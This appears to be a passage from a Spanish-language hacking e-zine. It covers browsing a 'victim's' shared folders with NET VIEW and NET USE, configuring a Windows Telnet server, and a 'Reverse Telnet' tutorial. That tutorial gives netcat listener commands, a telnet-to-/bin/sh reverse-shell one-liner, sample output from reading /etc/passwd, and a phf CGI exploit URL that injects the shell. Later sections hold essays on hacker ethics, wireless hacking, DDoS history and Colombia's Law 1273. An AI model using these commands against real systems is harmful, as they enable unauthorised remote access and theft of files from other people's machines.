Recursos que comparte la máquina objetivo. Ya viendo los recursos que comparte, procedemos a acceder a la máquina,(Inicio-->Ejecutar-->Y escribimos \\IP_Maquina donde IP_Maquina es la IP de la máquina objetivo. Ejemplo: \\222.222.222.222 y presionamos Aceptar. Ver siguiente imagen:
En el cuadro Ejecutar escribimos \\IP_Maquina Tardará un poco en aparecer una ventana con los recursos que comparte, pero aparecerá, so se los aseguro (a menos que esta maquina se halla desconectado). A partir de aquí es cuestión de que den doble clic sobre uno de los recursos y comiencen a explorar la pc de la victima. Ver siguiente imagen:
Máquina remota con recursos compartidos. Hay veces en las que la aplicación IPScan mostrará información de NETBIOS y hasta en la consola de MS-DOS les mostrará el tan buscado número 20 de los “números raros de la derecha”, pero que al momento de hacer NET VIEWIP_Maquina les muestra un error que dice No se ha encontrado la ruta de acceso a la red. Bueno, esto se debe a que pudo ser que el usuario se desconectó o que simplemente deberás escribir NET USE \\IP_Maquina o también NET VIEW \\IP_Maquina (noten las dos barras invertidas). En caso de que ninguna de estas opciones funcione, recomendamos que cambien de máquina o busquen una mejor forma de acceder a ellas...(Papá Gates les dice cómo en su página). Estando dentro: ¿Qué podemos hacer? Las cosas que se podrán hacer dependerán de los recursos compartidos y de los permisos de lectura/escritura establecidos en dichos recursos. Todo lo contrario a lo anterior si se accede a una máquina con recursos compartidos y con privilegios de escritura/lectura, pues podrán copiar, eliminar, modificar, renombrar o esconder archivos con toda la libertad del
mundo. Cabe mencionar que cualquier proceso llevado a cabo en la máquina remota será exageradamente lento.
¿Qué es Telnet? Es un protocolo, es decir un programa que permite la conexion remota entre un servidor (servidor telnet) y uno o varios clientes (terminales) que son el o los PC's que se conectan a ese servidor usando un nombre y una contraseña. Las diferencias principales estan en que no tienen un entorno grafico ya que la conexion y las acciones como copiar, cambiar de ficheros cambiar de directorios y muchas otras se realizan en modo consola es decir un entorno no grafico similar al del MS DOS, otra caracteristica es la de hacer el "logeado" o autentificacion de usuario llevando la peticion al servidor en modo de texto plano, quiere decir que los datos no viajan encritptados y son faciles de capturar para poder ingresar a una maquina con el nombre y pass de otro usuario, por lo cual se dejo de utilizar hace algunos años y se remplazo por SSH que seria una version mejorada de telnet por la encriptacion de datos que maneja
al pasar información.... Como configurar a nuestro PC para que sea un servidor TELNET? - Primero entra a Inicio - Panel de Control - Herramientas - Administrativas Servicios.
Veras que hay varios bajas y buscas "Telnet" le haces dos clic's y veras en Tipo de Inicio = Deshabilitado lo cambias por Automatico quiere decir que se iniciara cada vez que el windows se cargue.
Luego te vas a Iniciar Sesion y le haces click a "Esta Cuenta" ahi pones el nombre de un Adminitrador de tu PC ya sea el tuyo o puedes crear otro en Inicio - Panel de Control - Cuentas de Usuario y creas uno nuevo para Telnet.
La contraseña puedes colocarla tanto en la Cuenta de Usuario como en Inicar sesion en la Pestaña de Propiedades de Telnet, o simplemente en Inicar sesion en la Pestaña de Propiedades de Telnet da igual, lo que nos interesa es que la contraseña este en La configuracion de TELNET. Ahora esta cuenta que creaste te sirve para que desde pc remoto puedas configurar las opciones de TELNET es decir inicios de sesion, numero de intentos fallidos en la conexion de un usuario cliente el puerto que utilizaras para la conexion telnet, es decir una cuenta de ADMINISTRADOR telnet. En mi caso cree un adminsitrador llamado "Telnet" para agregarlo a Inicar Sesion. Si solo quieres conectarte no es necesario este paso de Iniciar sesion solo nececitas tener una cuenta en Cuentas de Usuaruios del Panel de Control y podras ingresar cono ese nombre y contraseña. Luego de hacer esto reinicias tu PC y cuando cargue de nuevo windows.
Ahora vamos Inicio --- ejecutar --- cmd y entraras a la consola de MS DOS ahi pulsas "tlntadmn" sin comillas y te saldra lo siguiente: Si has hecho algo mal durante el proceso te aparecera el siguiente mensaje:
Si ha salido todo correctamente. Ya tienes tu servidor Telnet, ahora puedes configurar algunos parametros con comandos de tlntadmn como ser: Para administrar un equipo que ejecuta el servidor Telnet Sintaxis: tlntadmn [\\servidorRemoto] [start] [stop] [pause] [continue] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. start Inicia el servidor Telnet. stop Detiene el servidor Telnet. pause Interrumpe el servidor Telnet. continue Reanuda el servidor Telnet. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario
si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para administrar sesiones Telnet: Sintaxis tlntadmn [\\servidorRemoto] [-s] [-k{IdDeSesión | all}] [-m {IdDeSesión | all} "mensaje"] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. -s Muestra las sesiones Telnet activas. -k{IdDeSesión | all} Termina sesiones. Escriba el identificador de sesión para terminar una sesión específica o escriba all para terminar todas las sesiones. -m {IdDeSesión | all} "mensaje" Envía un mensaje a una o varias sesiones. Escriba el identificador de sesión para enviar un mensaje a una sesión específica o escriba all para enviar un mensaje a todas las sesiones. Escriba el mensaje que desea enviar entre comillas (es decir, "mensaje"). /? Muestra Ayuda en el símbolo del sistema. Para establecer el dominio predeterminado en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [dom=nombreDeDominio] [u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. dom= nombreDeDominio Especifica el dominio que desea convertir en el dominio predeterminado. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema.
Ejemplos Para hacer de Server1 el dominio predeterminado en el servidor local, escriba: tlntadmn config dom=Server1 Para asignar la tecla Alt en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [ctrlakeymap={yes | no}] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. ctrlakeymap={yes | no} Especifica si desea que el servidor Telnet interprete CTRL+A como ALT. Escriba yes para asignar la tecla de método abreviado o no para impedir la asignación. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Para establecer el número máximo de conexiones en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [maxconn=enteroPositivo] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. maxconn= enteroPositivo Establece el número máximo de conexiones. Este número debe especificarse con un entero positivo que sea más pequeño que 10 millones. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para establecer el número máximo de intentos de inicio de sesión erróneos en un equipo que ejecuta el servidor Telnet:
Sintaxis tlntadmn [\\servidorRemoto] config [maxfail=enteroPositivo] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. maxfail= enteroPositivo Establece el número máximo de intentos de inicio de sesión erróneos que se le permite a un usuario. Este número debe especificarse con un entero positivo que sea más pequeño que 100. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para establecer el modo de operación en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [mode={console | stream}] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. mode={console | stream} Establece el modo de operación. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para establecer el puerto Telnet en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [port=valorEntero] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. port= valorEntero
Establece el puerto Telnet. Debe especificar el puerto con un entero más pequeño de 1.024. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para establecer los métodos de autenticación en un equipo que ejecuta el servidor Telnet Sintaxis tlntadmn [\\servidorRemoto] config [sec=[{+ | -}ntlm][{+ | -}passwd]] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. sec=[{+ | -}ntlm][{+ | -}passwd] Especifica si desea utilizar NTLM, una contraseña o ambos para autenticar intentos de inicio de sesión. Para utilizar un tipo determinado de autenticación, escriba un signo más (+) antes de ese tipo de autenticación. Para impedir el uso de un determinado tipo de autenticación, escriba un signo menos (-) antes de ese tipo de autenticación. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Para establecer el tiempo de espera para sesiones de inactividad en un equipo que ejecuta el servidor Telnet: Sintaxis tlntadmn [\\servidorRemoto] config [timeout=hh:mm:ss] [-u nombreDeUsuario-p contraseña] Parámetros \\ servidorRemoto Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local. timeout= hh : mm : ss Establece el período de tiempo de espera en horas, minutos y segundos. -u nombreDeUsuario -p contraseña Especifica las credenciales administrativas del servidor
remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas. /? Muestra Ayuda en el símbolo del sistema. Doy un ejemplo aqui de como configurar el puerto que utilizara telnet para su conexion:
Ahora, cambiamos el puerto por defecto 23, al puerto 100. El puerto que utilize TelNet debe ser menor a 1024. Ahora veran en en este ejemplo hemos cambiado el puerto 23 al 100, entonces para probar que funciona nuestro servidor Telnet ejecutamos "TelNet 127.0.0.1 100" ¿Por que? 127.0.0.1 es la IP "interna" o "localhost" que tienen todos los Pc's por defecto, entonces, la utilizamos para hacer una autoconexion con nosotros mismos para ver si esta "bien" nuestro servidor Telnet. 100 es el puerto que cambiamos al servidor Telnet. “Nos aparecera una imagen” →
Tecleamos "s" & precionamos ENTER. Vea imagen:
Los comandos que se utilizan para moverse en telnet tambien sirven para ftp, estan en escritos en UNIX, asi que aqui les dejo el enlace para que puedan ver que comandos les interesa saber como ser "get" "mget" que son los que sirven para descargar archivos de un pc remoto. UNIX: http://es.tldp.org/Tutoriales/UXO/uxo/ Ò UNIX: http://www.manualesdeayuda.com/manuales/sistemasoperativos/unix/unix-avanzado-i--manejo-de-comandos01758.html Si hacen una Autoconexion, o en una LAN pueden utilizar comandos de MS DOS, como ser: cd, md, dir y muchos otros que te serviran para "moverte" en el disco duro de la victima. NOTA: En caso de querer comunicarnos desde una PC remoto, tendriamos que seguir la secuencia: Inicio - Ejecutar - Telnet "La IP publica del PC" 100, es decir la IP que (seria la que nos muestra en Internet cuando ingresamos a www.cualesmiip.com) Tambien existen programas para hacer intrusión de manera automatica, pero creemos que no es necesario hablar de ello.
Reverse Telnet 1- ¿Qué es Reverse Telnet? Como su nombre indica, es una tecnica basada en Telnet, es decir, abrir una sesion remota entre una maquina y otra, pero al contrario que en otros ataques, en este caso, la maquina atacada "Target Host" sera la que nos haga Telnet a nosotros, esta tecnica tambien se le llama "Back Channel", y es muy util cuando queremos hacer Telnet a una maquina y no esta habilitado el puerto de Telnet. 2- Explicacion del Proceso, & Ejemplos El proceso de "Reverse Telnet" es simple, se trata de invertir el proceso de Telnet, es decir que en vez de iniciar la secion en nuestro PC & terminar en un servior remoto, lo que vamos a hacer es abrir unos puertos en nuestra maquina que actuaran de servidor, e iniciar un cliente en la maquina remota. ¿Còmo habilitamos el pseudo-servidor en nuestra maquina? Recurrimos al nunca bien valorado NetCat, posiblemente una de las mejores herramientas las cuales se han inventado...Levantaremos dos puertos, uno para enviar datos & otro para recibir una terminal. nc -nvv -l -p 80 nc -nvv -l -p 25 Parametros: -n -vv -l -p
Solo IPs numerica. Modo Mega-verbose. Listen mode. Espera a conexiones entrantes. Numero del puerto que queremos habilitar.
Luego de "levantar" nuestro servidor de Telnet en nuestra maquina (192.168.1.4), ahora lo que tenemos que hacer es iniciar la conexion desde la maquina remota, para eso escribimos el siguiente comando: telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25 Abrimos una conexion desde la maquina remota al puerto 80 de nuestra maquina, hacemos llegar la entrada de esta conexion a una shell (/bin/sh) mediante un pipe & redirigimos la salida de la shell mediante otro pipe a neustra nueva
maquina, al puerto 25, por donde vamos a recibir las respuestas. Ahora tenemos todo el tinglado montado, ahora solo falta que funcione, deberiamos tener lo siguiente en cada terminal: Terminal 1 - Puerto 80 - Envio de comandos -----------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ... Terminal 2 - Puerto 25 - Recepcion de respuestas ----------------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 25 listening on [any] 25 ... Si fuesemos capaces de ver lo que se ejecuta en la maquina remota veriamos lo siguiente... Target Host ----------[root@pollo netcat]# telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25 Trying 192.168.1.4... Connected to 192.168.1.4. Escape character is '^]'. /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Digo “si fuesemos capaces” porque lo normal seria que no lo veamos, sino ¿para que montar este tinglado? Siguiente paso... Ejecutar comandos en la maquina remota, para hacer esto debemos enviar a traves de nuestra terminal con el netcat en el puerto 80, los comandos en un formato especifico, este formato es el siguiente: echo `comando_a_ejecutar parametros` veamos un ejemplo practico de esto, ejecutemos el tipico y deseado cat /etc/passwd y veamos que sucede…
Terminal 1 - Puerto 80 - Envio de comandos -----------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ... connect from (UNKNOWN) [192.168.1.2] 2144 echo `cat /etc/passwd` Terminal 2 - Puerto 25 - Recepcion de respuestas ----------------------------------------------[root@vaca netcat]# ./nc -nvv -l -p 25 connect from (UNKNOWN) [192.168.1.2] 2145 root:x:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:dae mon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/ sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbi n:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:1 00:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopherdata: ftp:*:14:50:FTP User:/home/ftp: nobody:*:99:99:Nobody:/: xfs:!!:100:101:X Font Server:/etc/X11/ fs:/bin/false gdm:!!:42:42::/home/gdm:/bin/bash Listo, igual que hemos ejecutado ese Cat, podemos ejecutar cualquier comando bajo el ID con el que hayamos ejecutado el comando en la maquina remota. Si pensamos un poco, llegamos a la conclusion...¿De que sirve esto, si para ejecutar Telnet en la maquina remota tengo que tener acceso a ella? Si, pero existen tipos...Ya lo veremos. 3. Cuando utilizar reverse telnet. En el punto anterior no quedaba clara la utilidad de esta tecnica, si tenemos una maquina en la que tenemos acceso a un cgi-bin/phf/php mal configurado y que nos permita ejecutar algun comando desde el navegador, bien, ejecutamos el comando citado anteriormente tendremos una shell sin usuario y sin password, el ejemplo usando el bug del phf, que aun existe, seria el siguiente: http://www.targethost.com/cgibin/phf?Qalias=x$0a/bin/telnet/%20192.168.1.4%2080%20|%20/b in/sh%20|%20/bin/telnet%20192.168.1.4%2025
Ya tendriamos nuestra shell up&running, igualmente podemos utilizar exploits remotos que solo nos permiten ejecutar codigo en el servidor para poner en practica esta tecnica, en fin...pon algo de imaginacion. Porque utilizar precisamente esos puertos, osea 25 y 80, simple, si la maquina esta con firewall activado, es mas facil que tenga abiertos hacia fuera, puertos de servicio comunes, que puertos mas altos o que se usen menos. 4. Herramientas & Software Lo unico necesario para llevar a cabo este tecnica es NetCat & un nvagador, màs por supuesto, tu interes. Hemos hablado mucho de Hacking, tecnicas, entre ellas intrusión, ingenieria social & demàs cosas interesantes, pero ¿Qué es un Hacker, & como ser uno? Continua leyendo y lo sabras.
El wireless o comunicación inalámbrica es el término utilizado para describir telecomunicaciones que utilizan ondas electromagnéticas para comunicarse entre dispositivos sin necesidad de un medio físico, es decir sin cables Ejemplos comunes de equipos wireless en uso hoy en día incluyen: Teléfonos móviles, que permiten colectividad entre personas. El sistema de posicionamiento global (GPS), que permite que coches, barcos y aviones comprueben su localización en cualquier parte de la tierra. Periféricos de ordenador wireless, como el ratón, los teclados y las impresoras, que se pueden también conectar a un ordenador vía wireless.
Teléfonos inalámbricos, de más corto alcance que los teléfonos móviles. Mandos a distancia (para televisión, vídeo, puertas de garaje, etc.) y algunos sistemas de alta fidelidad. Monitores para bebés, estos dispositivos son unidades de radio simplificadas que transmiten/reciben dentro de una gama limitada. Televisión vía satélite, permiten que los espectadores, desde casi cualquier parte, seleccionen entre centenares de canales. LANs wireless o flexibilidad y ordenadores.
local área networks, proporcionan fiabilidad para usuarios de
Introducción al hacking Wireless El hacking es el arte de desarrollar nuevas técnicas de ataque, estrategias de ataque, nuevas y mejores herramientas de seguridad mas no seguir los pasos de una receta (tutoriales) para lograr su cometido ya sea este de buenos o malos fines. No nos responsabilizamos por el uso que se le dé a esta información, por que la intención de esta revista no es más que darles a conocer un poco más sobre el amplio mundo del hacking y todas las sorpresas que podemos encontrar en este. Hacking Wireless Consiste en acceder a la red WLAN de otro usuario y utilizar su ancho de banda para conectarse a internet (es decir nos conectamos por el morro). Acceder a los recursos compartidos de los demás ordenadores de la red y sustraer datos confidenciales de todo tipo. Hacking una red con un router Consiste en ganar acceso a un ordenador que se encuentra detrás de una red y se conecta mediante un server/gateway/router (lo que sea) a internet. Sobre esto también estoy posteando así que si les interesa pueden mirar mis últimos mensajes, e informarse de como funcionan las IPs en una red, la teoría de ataque, métodos para saltarse router y firewall (como conexiones inversas ya sea mediante netcat o troyanos de conexión inversa). Nota: Temas como esto, en los cuales no hemos profundizado, se ampliaran en la próxima E-zine.
Las preguntas más frecuentes en la red: ¿Qué es un hacker? ¿Y cómo ser uno? Para ser un HACKER (maldita palabra mal entendida por unos y peor utilizada por otros) solo hace falta dos cosas: curiosidad y medios, a partir de ahora la curiosidad deberá ponerla USTED, porque los medio los facilitaremos NOSOTROS. En las siguientes líneas descubrimos como podremos seguir nuestros objetivos y definimos algunas de las palabras que más han sido violadas y retorcidas en su significado. Hacker: Este termino ha sufrido a lo largo de su corta historia una horrible conspiración perpetrada por la ignorancia de los medios, eso que personalmente llamo "periodismo de telediario" (en clara alusión a los ridículos artículos que no hacen mas que intoxicar nuestra percepción de las cosas e insultar nuestra inteligencia.) Este tipo de periodismo unido a "otros poderes", desde los monopolios que deben justificar su incompetencia hasta los gobiernos que deben justificar sus intereses ocultos pasando por la industria del cine (normalmentedemonlògica) y los medios informativos "de masas".
Pues bien, HACKER no es más que una persona que posee conocimientos avanzados sobre una materia en concreto, normalmente relacionados con la tecnología aunque ni mucho menos limitado a ello. Ponen sus aptitudes al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el funcionamiento de "las masas" y no encuentran límites en sus caminos más que su propia curiosidad. No se dedican a destruir ni a causar estragos entre sus "victimas", no se dedican a robar ni a chantajear ni a regodearse de sus "conquistas", muy al contrario suelen advertir a terceros de las debilidades de sus sistemas y, desgraciadamente, esos "terceros" en un lugar de agradecerles su aviso se dedican a denunciarlos o perseguirlos... aunque no siempre es así, por supuesto, muchas compañías y gobiernos han aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un hacker (el papa ventanas), como Linus Torvalds (el papa Linux) o Grace Hooper (la Almirante, creadora del Lenguaje COBOL), los autores del COREWAR Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informáticos), Fred Cohen (el primer investigador y autor de los virus de la historia), Dennis Ritchie y Ken Thompson ("hacedores" del Lenguaje C y cocreadores del SO UNIX), Gary Kildall (autor del sistema operativo CMP y CPM/86), Tim Paterson (autor del Quick y Dirty DOS), Morris (autor del virus "The tour of the Worm"), Kevin Mitnick (el mas buscado por el FBI), Phiber Optik (líder juvenil convertido en símbolo de los hackers), Richard Stallman (impulsor del "software gratuito" y GNU), Johan Helsingius (primer conductor de un Remail Anónimo), Chen IngHou (autor del virus CIH Chernobyl-), Sir Dyistic (creador del Back Orifice), David L- Smith (virus Melissa), Reonel Raomez (virus LoveLetter), Vladimir Levin (Robo electrónicamente 10 millones de dólares al Citibank), y muchos más. ¿Como? ¿Pero no hemos dicho que los hackers no cometen delitos? Pues NO, vuelve a leer su definición...pero claro, de todo hay en la vida del señor, y al igual que hay delincuentes entre el clero hay hackers que en un momento u otro han -caído- en la ilegalidad nadie es perfecto!!!...y Bill Gates es un HACKER? Por supuesto, solo tienes que leerte su biografía. ¿Sorprendido? Sigue leyendo... Los primeros en desautorizar los espectaculares incidentes de seguridad informática suelen ser, precisamente, los hackers. Pioneros de la red y sus habitantes más arraigados, Internet está hecha a imagen y semejanza de su filosofía (sistemas abiertos, interoperatividad, hacer real la ciencia-ficción). ¿Cómo alguien puede creer que disfrutemos destruyéndola? se lee, una y otra vez, en las listas de correo y otras zonas electrónicas donde se comunican.
Entre ellos -pocas mujeres-, está comúnmente aceptado que no es considerado hacker quien cambia una página Web o daña ordenadores. En la mayoría de ocasiones, el atacante sólo ha necesitado algunos conocimientos de informática y leerse el manual de los programas que hacen todo el trabajo, disponibles en Internet y escritos por los auténticos hackers. Un hacker es, según el reputado diccionario de jerga informática "Jargon File", "[originariamente, alguien que hace muebles con un hacha] Persona que disfruta explorando los detalles de los sistemas programables y cómo forzar sus capacidades, opuesto a la mayoría de usuarios, que prefieren aprender sólo lo mínimo necesario". La seguridad de programas es sólo uno de los temas que interesan a estos expertos informáticos, otros se especializan en "hardware", líneas telefónicas, televisión, etc. Muchos trabajan como administradores de sistemas, programadores, consultores, profesores o son estudiantes de informática y telecomunicaciones, con suficiente tiempo para aprender, crear, liberar, sus verbos preferidos, surgidos de la llamada "ética hacker", una mezcla entre "hippie" y "ciberpunk", juegos de rol y sonrisas artificiales. Compartir información, programas, recursos. Aborrecer lo que suene a control y centralización. Buscar alternativas imaginativas a los problemas. No robar. No al vandalismo. Sí a la privacidad. La seguridad, junto a la construcción colaborativa de programas libres (proyectos Linux o FreeBSD), es el campo que más auge está viviendo en el mundo hacker. La ética aquí consiste en monitorizar programas y máquinas de la red y avisar privadamente a quien tenga un sistema inseguro. Si no ha habido respuesta o si es de interés general, pasados unos días se envía el aviso a foros como BugTraq, leído por todos los expertos en seguridad que se precien. Allí es frecuente ver a algunos de los más conocidos hackers del planeta, como Mixter, el creador del programa de DDoS TFN2K, quien horas después de los ataques en Yahoo! discutía tranquilamente sobre la repercusión de su invento. Sombras y luces del país de las cíbermaravillas, donde dicen que no se es hacker hasta que alguien así te describe. [Los hackers llaman a los autores de ataques automatizados "script-kiddies" (niños con programas), jóvenes -de cabeza o de cuerpo- vándalos, a veces estudiantes con mucho tiempo, que monitorizan la red a la búsqueda de sistemas débiles. Los asaltan con programas concebidos primariamente como herramientas de seguridad defensiva o de análisis, que han encontrado en Internet, en lugares como Rootshell o Antionline. El manido lema de los hackers, "la información
debe ser libre", se convierte así en peligro potencial para quien esté desprotegido. Aunque, en este mundo donde nada es lo que parece, no puede afirmarse categóricamente que quien cambia una página Web o rompe un sistema sea siempre un chiquillo con poco seso. Hay también reputados hackers que alguna vez han practicado el llamado "hacktivismo", consistente en realizar acciones espectaculares, como entrar en los ordenadores del gobierno de Indonesia, por razones políticas o sociales. Pero no toda la comunidad está de acuerdo con la nueva moda del hacktivismo y muchos siguen teniendo claro que quien construye es un hacker y quien destruye, no. Para éste, han inventado nombres como script-kiddie, lamer (quien usa programas de los otros y no sabe escribir los suyos) o cracker (quien destruye sin razón, aunque entran también en esta categoría los que rompen protecciones anticopia y algoritmos criptográficos, a veces con buenas causas, como demostrar al mundo la fragilidad de los sistemas GSM o DVD). Los últimos incidentes han despertado las voces, en la misma comunidad, discordantes con la tradición de ofrecer repositorios de programas "peligrosos" en Internet y contra sus autores. El problema es decidir qué programas son más malos que buenos y si normas restrictivas acabarían con ellos. Los mejores almacenes de programas no son fácilmente localizables, muchos no están ni en la Web y el acceso es restringido a personas de confianza. Dicen que lo bueno que tiene Internet es que interpreta la censura como un error del sistema y la circunvala. Nunca nadie ha conseguido quitar algo de la red que no hayan nacido, al instante, diez nuevos sitios donde lo ofrecen.
Delito informático, crimen genérico o crimen electrónico, que agobia con operaciones ilícitas realizadas por medio de Internet o que tienen como objetivo destruir y dañar ordenadores medios electrónicos y redes de Internet. Sin embargo, las categorías que definen un delito informático son aún mayores y complejas y pueden incluir delitos tradicionales como el fraude, el robo, chantaje, falsificación y la malversación de caudales públicos en los cuales ordenadores y redes han sido utilizados. Con el desarrollo de la programación y de Internet, los delitos informáticos se han vuelto más frecuentes y sofisticados. Existen actividades delictivas que se realizan por medio de estructuras electrónicas que van ligadas a un sin numero de herramientas delictivas que buscan infringir y dañar todo lo que encuentren en el ámbito informático: ingreso ilegal a sistemas, interceptado ilegal de redes, interferencias, daños en la información (borrado, dañado, alteración o supresión de data crédito), mal uso de artefactos, chantajes, fraude electrónico, ataques a sistemas, robo de bancos, ataques realizados por hackers, violación de los derechos de autor, pornografía infantil, pedofilia en
Internet, violación de información confidencial y muchos otros.
La Ley 1273 de 2009 creó nuevos tipos penales relacionados con delitos informáticos y la protección de la información y de los datos con penas de prisión de hasta 120 meses y multas de hasta 1500 salarios mínimos legales mensuales vigentes. El 5 de enero de 2009, el Congreso de la República de Colombia promulgó la Ley 1273 “Por medio del cual se modifica el Código Penal, se crea un nuevo bien jurídico tutelado – denominado “De la Protección de la información y de los datos”- y se preservan integralmente los sistemas que utilicen las tecnologías de la información y las comunicaciones, entre otras disposiciones”. Dicha ley tipificó como delitos una serie de conductas relacionadas con el manejo de datos personales, por lo que es de gran importancia que las empresas se blinden jurídicamente para evita incurrir en alguno de estos tipos penales. No hay que olvidar que los avances tecnológicos y el empleo de los mismos para apropiarse ilícitamente del patrimonio de terceros a través de clonación de tarjetas bancarias, vulneración y alteración de los sistemas de cómputo para recibir servicios y transferencias electrónicas de fondos mediante manipulación de programas y afectación de los cajeros automáticos, entre otras, son conductas cada vez más usuales en todas partes del mundo. Según la Revista Cara y Sello, durante el 2007 en Colombia las empresas perdieron más de 6.6 billones de pesos a raíz de delitos informáticos. De ahí la importancia de esta ley, que adiciona al Código Penal colombiano el Título VII BIS denominado "De la Protección de la información y de los datos" que divide en dos capítulos, a saber: “De los atentados contra la confidencialidad, la integridad y la disponibilidad de los datos y de los sistemas informáticos” y “De los atentados informáticos y otras infracciones”. Ahora sabiendo que son los delitos informàticos, veamos a la seguridad en acciòn…
Los ataques de Denegación de Servicio (DoS) eran tan viejos como Internet. Pero no parecían quitar el sueño a nadie, hasta que televisores de medio mundo mostraron a famosos servicios, como Yahoo! o E-Bay, fuera de combate. Este y otros incidentes, cada vez más graves, abonan el campo de la seguridad informática, para el que se auguran tiempos de cosecha. Mixter, el autor de un programa que, supuestamente, fue utilizado en los ataques contra Yahoo!, aseguraba, en una entrevista con ZDNet, que lo había creado no como herramienta de destrucción sino para testear la seguridad de sistemas informáticos. Un doble filo que se repite en toda la red, construida para sobrevivir a un ataque nuclear y, en cambio, frágil: "El problema real es la inseguridad que crean todas las máquinas vulnerables que hay en Internet, no la gente que las está atacando", avisaba Mixter.
La seguridad en Internet es asunto difícil, ya que todos dependen de todos y se es tan fuerte como el eslabón más débil de la cadena. El ataque contra Yahoo!, llamado de Denegación Distribuida de Servicio (DDoS), consistió en entrar previamente en unos cuantos ordenadores con conexiones potentes (universidades, empresas...), e instalarles un programa. A una orden del atacante, todos se lanzaron contra el objetivo, enmascarando además sus direcciones de origen (lo que se llama IP Spoofing), por lo que resultaba muy difícil saber de donde venían los tiros. "Si tienes una máquina insegura, puede que no te afecte, es tuya, pero es que también puede servir para lanzar ataques contra otras que no tienen la culpa. Lo injusto de los DoS es que, por muy bueno que seas y muy preocupado que estés por la seguridad, no puedes evitarlo. La lección de esto no es sólo que Internet sea vulnerable y esté en pañales, sino que hay cantidad de máquinas y redes importantes, como las universidades, que no se preocupan", afirma Jesús Cea, experto en seguridad y administrador de sistemas, quien sufre una media de un ataque de Denegación de Servicio por semana. Cea, moderador de la única lista de discusión pública sobre 'hacking' en castellano, considera que estas acciones no tienen nada que ver con los 'hackers', aunque reconoce su utilidad para demostrar que hay cosas a mejorar: "Los 'crackers' que muestran fallos de seguridad, cambian páginas en webs o roban listas de tarjetas de crédito en general hacen más bien que mal, porque demuestran que no es oro todo lo que reluce y que 